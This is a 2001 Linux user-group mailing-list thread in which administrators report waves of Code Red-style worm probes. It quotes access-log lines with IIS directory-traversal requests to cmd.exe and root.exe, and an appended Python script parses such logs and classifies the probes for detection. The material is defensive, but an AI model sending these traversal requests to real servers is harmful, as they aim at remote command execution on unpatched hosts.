[ale] CodeRed attacks, here we go again.

Guillaume triton at madchat.org
Tue Sep 18 16:25:59 EDT 2001



Me too, exact same, but from this (mindspring) address 66.32.93.51
for the last hits on my squid proxy.

"Brian J. Dowd" wrote:
> 
> Yes, 1475 attempts so far today on one minor server.
> -Brian J. Dowd
> 
> > Ditto here.  400 hits in 2 hours.  Looks like another Code Red Variant......
> >
> > Mike
> >
> > -----Original Message-----
> > From: Terry Lee Tucker [mailto:terry at esc1.com]
> > Sent: Tuesday, September 18, 2001 10:24 AM
> > To: SAngell at nan.net; ale at ale.org
> > Subject: Re: [ale] CodeRed attacks, here we go again.
> >
> > I'm getting hit with the following:
> >
> > 208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> > 208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> > 208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> > 208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> > 208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> > 208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
> > 208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
> > 208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> > 208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> > 208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> >
> > Obviously, someone is trying to get something from a windoze box.
> >
> > SAngell at nan.net wrote:
> > >
> > > I am being flooded by Code Red attacks originating from network 205.152.x.x, all
> > > by the variant which is attempting to drop the trojan backdoor onto my servers,
> > > either root.exe or explorer.exe. This attack is worse than any I have previously
> > > seen, with hundreds of attempts in the last 5 minutes.
> > >
> > > Anyone else witnessing these?
> > >
> > > \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> > > \_    Steve Angell,  MCSE, CCNA           _/
> > > \_    MIS Operations Manager               _/
> > > \_    TSYS Total Debt Management  _/
> > > \_    Norcross, GA                                   _/
> > > \_    Phone 770-409-5570                    _/
> > > \_    Fax      770-416-1752                   _/
> > > \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> > >
> > > --
> > > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
> > body.
> >
> > --
> > Sparta, NC 28675 USA
> > 336.372.6812
> > http://www.esc1.com
> > The Gates of hell shall NOT prevail...

-- 
OpenPGP 0x9A3D4CA1
http://pgp.mit.edu http://www.keyserver.net
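
Added example, not code from anyone on the thread: a small Python script that parses Common Log Format lines like the ones Terry quoted, labels each worm probe by the trick it uses (the root.exe backdoor, the C:/D: virtual roots, the double-encoded %255c traversal, or the overlong-UTF-8 traversal), and counts hits per source address, which is the number the replies above are tallying by hand. The sample log is constructed (the 208.5.209.246 entries copy requests from the quoted log; the 66.32.93.51 line and the two ordinary page fetches are made up), and the two extra overlong encodings %c0%af and %c1%9c are an assumption on my part, added because they come from the same IIS Unicode bug as the %c0%2f and %c1%1c forms in the log.

```python
"""Tally worm-style probes (root.exe / cmd.exe traversal) in an Apache access log.

Added example, not code from the thread.  The probe signatures are taken
from the quoted log lines plus two further overlong-UTF-8 encodings of '/'
and '\\' from the same IIS Unicode bug (an assumption, not from the page).
"""
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format as written by Apache (the format the quoted lines use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Overlong UTF-8 encodings of '/' and '\'.  %c0%2f and %c1%1c appear in the
# quoted log; %c0%af and %c1%9c are assumed here as the other common forms.
OVERLONG_ENCODINGS = ("%c0%2f", "%c0%af", "%c1%1c", "%c1%9c")

# Constructed sample log: the 208.5.209.246 entries copy probes from the
# quoted log, the other three lines are made up (one probe from the address
# in the reply above, two ordinary page fetches).
SAMPLE_LOG = """\
208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.32.93.51 - - [18/Sep/2001:16:02:11 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
10.0.0.5 - - [18/Sep/2001:16:03:00 -0400] "GET /index.html HTTP/1.0" 200 1435
10.0.0.7 - - [18/Sep/2001:16:04:12 -0400] "GET /images/logo.gif HTTP/1.0" 200 8871
"""


def classify_request(path):
    """Label a request path as a known probe type, or return None if benign."""
    lowered = path.lower()
    # Peel off repeated percent-encoding: %255c -> %5c -> '\'.
    decoded = lowered
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")

    if "root.exe" in decoded:
        # root.exe is the copy of cmd.exe that Code Red II left in /scripts and /MSADC.
        return "root.exe backdoor"
    if "cmd.exe" in decoded:
        if any(enc in lowered for enc in OVERLONG_ENCODINGS):
            return "cmd.exe via unicode traversal"
        if "%255c" in lowered or "../" in decoded:
            return "cmd.exe via double-decode traversal"
        # /c/winnt/... and /d/winnt/... reach the drive roots without any traversal.
        return "cmd.exe direct"
    return None


def scan_log(text):
    """Return (probes, per_ip): matched (ip, label, path) tuples and hits per source."""
    probes = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a squid access.log needs its own parser
        label = classify_request(m["path"])
        if label:
            probes.append((m["ip"], label, m["path"]))
            per_ip[m["ip"]] += 1
    return probes, per_ip


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for ip, label, path in found:
        print(f"{ip:15} {label:36} {path}")
    print("hits per source:", dict(counts))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents. The 404s in the quoted log only say the requested files do not exist on that server; the sources are still infected hosts worth blocking or reporting to their ISP. A squid access.log is not in Common Log Format by default, so the regex above will skip those lines until it is adapted.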
